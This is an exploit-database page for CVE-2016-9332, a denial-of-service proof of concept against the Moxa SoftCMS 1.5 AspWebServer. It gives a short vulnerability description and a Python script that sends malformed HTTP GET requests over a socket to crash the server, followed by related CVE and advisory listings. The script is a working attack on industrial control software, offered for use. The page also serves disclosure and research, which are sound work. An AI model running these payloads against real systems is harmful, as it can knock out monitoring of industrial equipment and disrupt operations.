Lucene search
Zhou Yu1337DAY-ID-26354HistoryNov 18, 2016 - 12:00 a.m.
Moxa SoftCMS 1.5 - Denial of Service (PoC) Exploit
2016-11-1800:00:00
Zhou Yu
0day.today
20
0.015 Low
EPSS
Percentile
87.1%
Exploit for windows platform in category dos / poc
'''
# Title: Moxa SoftCMS 1.5 AspWebServer Denial of Service Vulnerability
# Author: Zhou Yu
# Email: [emailΒ protected]
# Vendor: http://www.moxa.com/
# Versions affected: 1.5 or prior versions
# Test on: Moxa SoftCMS 1.5 on Windows 7 SP1 x32
# CVE: CVE-2016-9332
# Advisory: https://ics-cert.us-cert.gov/advisories/ICSA-16-322-02
Vulnerability Description:
AspWebServer does not properly validate input. An attacker could provide unexpected values and cause the program to crash or excessive consumption of resources could result in a denial-of-service condition.
Vulnerability Discovery Method:
With the help of kitty fuzzing framework, we are able to find some vulnerabilities of the AspWebServer when parsing HTTP GET request. Details of the fuzzer scripts and output can be found here: https://github.com/dazhouzhou/ICS-Vulnerabilities/tree/master/Moxa/SoftCMS .
'''
import socket
host = '192.168.124.128'
port = 81
# extracted four payloads from crashes that can crash the AspWebServer.exe
payload1 = 'GET /\ HTTP/1.1\r\n\r\n'
payload2 = 'GET \x00 HTTP/1.1\r\n\r\n'
payload3 = 'GET \n HTTP/1.1\r\n\r\n'
payload4 = 'GET /. HTTP/1.1\r\n\r\n'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send(payload1)
s.close()
# 0day.today [2018-01-05] #Related
exploitpack
exploitpack
Moxa SoftCMS 1.5 - Denial of Service (PoC)
2016-11-18 00:00:00
cve
cve
CVE-2016-9332
2017-02-13 21:59:01
cvelist
cvelist
CVE-2016-9332
2017-02-13 21:00:00
nvd
nvd
CVE-2016-9332
2017-02-13 21:59:01
prion
prion
Race condition
2017-02-13 21:59:00
exploitdb
exploitdb
Moxa SoftCMS 1.5 - Denial of Service (PoC)
2016-11-18 00:00:00
ics
ics
Moxa SoftCMS Vulnerabilities
2016-11-17 12:00:00